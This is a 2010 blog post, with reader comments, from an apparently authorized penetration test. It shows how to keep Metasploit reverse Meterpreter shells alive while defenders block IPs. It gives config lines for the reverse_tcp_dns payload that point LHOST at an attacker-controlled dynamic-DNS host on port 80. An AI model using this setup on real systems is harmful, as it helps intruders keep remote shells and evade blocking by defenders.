continue reading hover preload topbar hover preload widget hover preload

Pen-testing RBL Pwnage (metasploit)

scenario

Penetrate the organization during a specific time, while a security team, that has been duly informed of your attacks, is watching like a hawk, and has an overwhelming desire to block IPs (false sense of security).  So as your exploits are successful, and your payloads are delivered, the security team is drooling over the IDS and blocking your reverse TCP IP and ports faster than stink on… well, something very stinky.

assumptions

payload

windows/meterpreter/reverse_tcp_dns – This is important, as we want the precedence of host resolution to be on execute, not at compile time

exploit

multi/handler
windows/meterpreter/reverse_tcp


solution

obfuscation

The good old, and not usually very useful ‘security by obscurity’… or in this case insecurity.  By not using 4444 or 5555 we could maybe cause the In-house team to second guess whether or not to block an IP.

set LPORT = 80

Simple.  But not the most effective.  Even if it delays their blocking the IP, it will still get blocked, and you’ll be in a return to drawing-board (msfpayload) mode; and if this repeats… you’ll have wasted your time, your clients time, and ultimately the entire test.

better obfuscation

Who cares if they block the IP, let dns be your shield. Coupled with port 80 this makes for a nice little solution.

set LPORT = 80

set LHOST = pwnsauced.webhop.net (using DynDNS, but any DNS solution that you can manage will suffice)

Simple.  Effective. The nice thing is, that you don’t even have to wait for the in-house team to block the IP;  Depending on TTL and your distance from the compromised machine, you could even change the IP yourself. So let them block IPs, you just change up your dns and keep on Pwning.

Categories: SecurityPosted on: 10th July 2010 by: Edward Prevost
Respond

  • 38 responses to "Pen-testing RBL Pwnage (metasploit)"

  • Comment posted on 12th July 2010 at 22:32 Stephen

    Last time I tried changing the LHOST to a DNS name, it resolved the DNS name to an IP address on compile, and stuck with that, so when you changed your IP address, it wouldn’t work any more. Have you actually tried this and got it to work, or is this just a theory?

  • Comment posted on 12th July 2010 at 23:00 Edward Prevost

    Yep it works… the trick is in using the reverse_tcp_dns. Make sure you’re using that.

  • Comment posted on 24th July 2010 at 22:40 dobrik13

    it was very interesting to read.
    I want to quote your post in my blog. It can?
    And you et an account on Twitter?

  • Comment posted on 24th July 2010 at 22:51 Edward Prevost

    Yeah, feel free to use the post however you see fit. I haven’t really ever used Twitter, but I intend to at somepoint… :)
    http://twitter.com/rezeusor

  • Leave a Reply


    Required fields are marked *

Archives